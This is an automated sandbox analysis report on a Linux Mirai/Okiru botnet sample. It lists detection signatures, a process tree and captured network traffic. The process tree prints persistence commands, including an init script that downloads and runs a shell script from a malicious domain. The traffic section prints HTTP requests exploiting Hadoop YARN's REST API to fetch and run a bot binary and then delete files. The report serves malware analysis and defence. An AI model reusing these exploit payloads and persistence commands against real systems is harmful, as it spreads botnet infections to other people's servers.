Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
tVdq8lEt3e.elf

Overview

General Information

Sample name:tVdq8lEt3e.elf
renamed because original name is a hash value
Original sample name:549627b2ba0ef60640456a03a70e46d4c45726443fd9ac4f48bddb8aab625c9b.raw.elf
Analysis ID:1509740
MD5:c42ba46f2b693cfe8b9ce093e62d5844
SHA1:f75f1265592f74362a6167061ad33a7627abcdc0
SHA256:549627b2ba0ef60640456a03a70e46d4c45726443fd9ac4f48bddb8aab625c9b
Tags:elf
Infos:

Detection

Mirai, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Contains symbols with names commonly found in malware
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1509740
Start date and time:2024-09-12 00:36:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:tVdq8lEt3e.elf
renamed because original name is a hash value
Original Sample Name:549627b2ba0ef60640456a03a70e46d4c45726443fd9ac4f48bddb8aab625c9b.raw.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/11@0/0

Warnings

  • VT rate limit hit for: tVdq8lEt3e.elf

Runtime Messages

Command:/tmp/tVdq8lEt3e.elf
PID:6221
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Attempting to bind on address 0.0.0.0
Standard Error:

Process Tree

  • system is lnxubuntu20
  • tVdq8lEt3e.elf (PID: 6221, Parent: 6136, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/tVdq8lEt3e.elf
    • sh (PID: 6225, Parent: 6221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6227, Parent: 6225)
      • systemctl (PID: 6227, Parent: 6225, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6241, Parent: 6221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 6247, Parent: 6241)
      • chmod (PID: 6247, Parent: 6241, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/mybinary
    • sh (PID: 6248, Parent: 6221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
      • sh New Fork (PID: 6250, Parent: 6248)
      • ln (PID: 6250, Parent: 6248, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
    • sh (PID: 6251, Parent: 6221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/tVdq8lEt3e.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting tVdq8lEt3e.elf'\n /tmp/tVdq8lEt3e.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping tVdq8lEt3e.elf'\n killall tVdq8lEt3e.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/tVdq8lEt3e.elf"
    • sh (PID: 6253, Parent: 6221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "chmod +x /etc/init.d/tVdq8lEt3e.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6255, Parent: 6253)
      • chmod (PID: 6255, Parent: 6253, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/tVdq8lEt3e.elf
    • sh (PID: 6256, Parent: 6221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6261, Parent: 6256)
      • mkdir (PID: 6261, Parent: 6256, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6262, Parent: 6221, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "ln -s /etc/init.d/tVdq8lEt3e.elf /etc/rc.d/S99tVdq8lEt3e.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6264, Parent: 6262)
      • ln (PID: 6264, Parent: 6262, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/tVdq8lEt3e.elf /etc/rc.d/S99tVdq8lEt3e.elf
  • systemd New Fork (PID: 6229, Parent: 6228)
  • snapd-env-generator (PID: 6229, Parent: 6228, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6272, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6272, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
tVdq8lEt3e.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    tVdq8lEt3e.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      tVdq8lEt3e.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        6221.1.00007f2a28017000.00007f2a28031000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
          6221.1.00007f2a28017000.00007f2a28031000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            Process Memory Space: tVdq8lEt3e.elf PID: 6221JoeSecurity_OkiruYara detected OkiruJoe Security
              Process Memory Space: tVdq8lEt3e.elf PID: 6221JoeSecurity_Mirai_9Yara detected MiraiJoe Security

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: tVdq8lEt3e.elfAvira: detected
                Multi AV Scanner detection for submitted file
                Source: tVdq8lEt3e.elfReversingLabs: Detection: 44%
                Source: tVdq8lEt3e.elfString: wgetcurlping/pswiresharktcpdumpnetstatpythonbusyboxiptablesnanonvimvimgdbpkillkillallapt/dev/watchdog/dev/misc/watchdoggorilla botnet is on the device ur not a cat go away/var/igorillaThe Gorilla Botnet Cats Came After You!kwws=22shq1jruloodiluhzdoo1vx2oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt

                Networking

                barindex
                Connects to many ports of the same IP (likely port scanning)
                Source: global trafficTCP traffic: 93.123.85.166 ports 38241,1,2,3,4,8
                Source: global trafficTCP traffic: 91.92.246.113 ports 38241,1,2,3,4,8
                Source: global trafficTCP traffic: 154.216.17.220 ports 38241,1,2,3,4,8
                Source: global trafficTCP traffic: 45.202.35.64 ports 38241,1,2,3,4,8
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 48330 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 48330 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 45478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38258 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37102 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 45162 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 39082 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52626 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46346 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46346 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 48256 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58376 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38034 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 56610 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42658 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 37442 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52634 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58836 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41508 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41508 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41508 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41508 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 46942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35222 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35222 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35222 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 33516 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 33516 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 33516 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 54040 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 43392 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 43392 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 43392 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35558 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 35558 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 54394 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 42478 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 53396 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 53396 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 53396 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 53396 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 50658 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 57430 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 56838 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 56838 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 40538 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 47320 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 56504 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 56504 -> 8088
                Source: unknownNetwork traffic detected: HTTP traffic on port 56504 -> 8088
                Source: global trafficTCP traffic: 192.168.2.23:43944 -> 151.210.79.118:8088
                Source: global trafficTCP traffic: 192.168.2.23:33766 -> 45.202.35.64:38241
                Source: global trafficTCP traffic: 192.168.2.23:49714 -> 76.204.79.118:8088
                Source: global trafficTCP traffic: 192.168.2.23:48330 -> 133.194.79.118:8088
                Source: global trafficTCP traffic: 192.168.2.23:57172 -> 94.220.79.118:8088
                Source: global trafficTCP traffic: 192.168.2.23:53248 -> 106.99.156.126:8088
                Source: global trafficTCP traffic: 192.168.2.23:44124 -> 154.216.17.220:38241
                Source: global trafficTCP traffic: 192.168.2.23:36878 -> 89.237.185.118:8088
                Source: global trafficTCP traffic: 192.168.2.23:59458 -> 91.92.246.113:38241
                Source: global trafficTCP traffic: 192.168.2.23:37102 -> 78.220.79.118:8088
                Source: global trafficTCP traffic: 192.168.2.23:49488 -> 222.102.85.235:8088
                Source: global trafficTCP traffic: 192.168.2.23:54658 -> 200.141.63.82:8088
                Source: global trafficTCP traffic: 192.168.2.23:45478 -> 52.160.110.126:8088
                Source: global trafficTCP traffic: 192.168.2.23:53914 -> 93.123.85.166:38241
                Source: global trafficTCP traffic: 192.168.2.23:49044 -> 27.174.203.118:8088
                Source: global trafficTCP traffic: 192.168.2.23:38258 -> 138.85.232.54:8088
                Source: global trafficTCP traffic: 192.168.2.23:45162 -> 82.207.23.152:8088
                Source: global trafficTCP traffic: 192.168.2.23:39082 -> 100.179.115.147:8088
                Source: global trafficTCP traffic: 192.168.2.23:52626 -> 103.108.227.184:8088
                Source: global trafficTCP traffic: 192.168.2.23:46346 -> 244.58.211.204:8088
                Source: global trafficTCP traffic: 192.168.2.23:50640 -> 99.17.152.234:8088
                Source: global trafficTCP traffic: 192.168.2.23:48256 -> 199.119.126.228:8088
                Source: global trafficTCP traffic: 192.168.2.23:58376 -> 123.191.93.71:8088
                Source: global trafficTCP traffic: 192.168.2.23:38034 -> 254.41.12.18:8088
                Source: global trafficTCP traffic: 192.168.2.23:56610 -> 213.49.53.56:8088
                Source: global trafficTCP traffic: 192.168.2.23:42658 -> 91.185.226.47:8088
                Source: global trafficTCP traffic: 192.168.2.23:37442 -> 187.125.238.133:8088
                Source: global trafficTCP traffic: 192.168.2.23:52634 -> 33.247.222.246:8088
                Source: global trafficTCP traffic: 192.168.2.23:58836 -> 182.203.244.103:8088
                Source: global trafficTCP traffic: 192.168.2.23:41508 -> 114.142.230.93:8088
                Source: global trafficTCP traffic: 192.168.2.23:46942 -> 208.35.19.171:8088
                Source: global trafficTCP traffic: 192.168.2.23:54884 -> 108.174.117.170:8088
                Source: global trafficTCP traffic: 192.168.2.23:44932 -> 207.65.222.48:8088
                Source: global trafficTCP traffic: 192.168.2.23:35222 -> 118.143.223.55:8088
                Source: global trafficTCP traffic: 192.168.2.23:59016 -> 115.202.13.183:8088
                Source: global trafficTCP traffic: 192.168.2.23:33516 -> 157.173.158.186:8088
                Source: global trafficTCP traffic: 192.168.2.23:49682 -> 56.83.140.120:8088
                Source: global trafficTCP traffic: 192.168.2.23:58104 -> 96.199.227.179:8088
                Source: global trafficTCP traffic: 192.168.2.23:52914 -> 61.221.100.106:8088
                Source: global trafficTCP traffic: 192.168.2.23:55982 -> 169.103.217.37:8088
                Source: global trafficTCP traffic: 192.168.2.23:60612 -> 185.229.214.63:8088
                Source: global trafficTCP traffic: 192.168.2.23:55228 -> 184.87.98.222:8088
                Source: global trafficTCP traffic: 192.168.2.23:44886 -> 242.135.104.48:8088
                Source: global trafficTCP traffic: 192.168.2.23:38494 -> 107.87.27.184:8088
                Source: global trafficTCP traffic: 192.168.2.23:54040 -> 81.209.218.53:8088
                Source: global trafficTCP traffic: 192.168.2.23:52146 -> 197.159.201.249:8088
                Source: global trafficTCP traffic: 192.168.2.23:57968 -> 25.192.234.141:8088
                Source: global trafficTCP traffic: 192.168.2.23:52328 -> 45.106.155.12:8088
                Source: global trafficTCP traffic: 192.168.2.23:51444 -> 204.235.25.185:8088
                Source: global trafficTCP traffic: 192.168.2.23:41746 -> 254.30.40.98:8088
                Source: global trafficTCP traffic: 192.168.2.23:47990 -> 5.178.90.206:8088
                Source: global trafficTCP traffic: 192.168.2.23:35558 -> 142.172.118.111:8088
                Source: global trafficTCP traffic: 192.168.2.23:54394 -> 112.144.139.77:8088
                Source: global trafficTCP traffic: 192.168.2.23:38942 -> 94.201.90.86:8088
                Source: global trafficTCP traffic: 192.168.2.23:42478 -> 31.240.32.116:8088
                Source: global trafficTCP traffic: 192.168.2.23:37500 -> 201.48.232.174:8088
                Source: global trafficTCP traffic: 192.168.2.23:35692 -> 116.61.241.191:8088
                Source: global trafficTCP traffic: 192.168.2.23:53396 -> 22.172.178.76:8088
                Source: global trafficTCP traffic: 192.168.2.23:50658 -> 49.179.51.163:8088
                Source: global trafficTCP traffic: 192.168.2.23:40366 -> 190.32.31.149:8088
                Source: global trafficTCP traffic: 192.168.2.23:35900 -> 155.39.86.162:8088
                Source: global trafficTCP traffic: 192.168.2.23:60474 -> 219.253.93.123:8088
                Source: global trafficTCP traffic: 192.168.2.23:57430 -> 186.99.201.69:8088
                Source: global trafficTCP traffic: 192.168.2.23:56838 -> 109.161.191.41:8088
                Source: global trafficTCP traffic: 192.168.2.23:40538 -> 62.49.198.58:8088
                Source: global trafficTCP traffic: 192.168.2.23:36662 -> 152.160.225.174:8088
                Source: global trafficTCP traffic: 192.168.2.23:47320 -> 77.210.59.160:8088
                Source: global trafficTCP traffic: 192.168.2.23:49788 -> 154.59.31.127:8088
                Source: global trafficTCP traffic: 192.168.2.23:52860 -> 129.177.89.220:8088
                Source: global trafficTCP traffic: 192.168.2.23:41466 -> 253.185.142.162:8088
                Source: global trafficTCP traffic: 192.168.2.23:39406 -> 137.226.163.11:8088
                Source: global trafficTCP traffic: 192.168.2.23:58336 -> 140.203.230.141:8088
                Source: global trafficTCP traffic: 192.168.2.23:44080 -> 8.182.34.156:8088
                Source: global trafficTCP traffic: 192.168.2.23:56504 -> 32.181.180.75:8088
                Source: global trafficTCP traffic: 192.168.2.23:46996 -> 117.161.23.95:8088
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 133.194.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 133.194.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 78.220.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 78.220.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
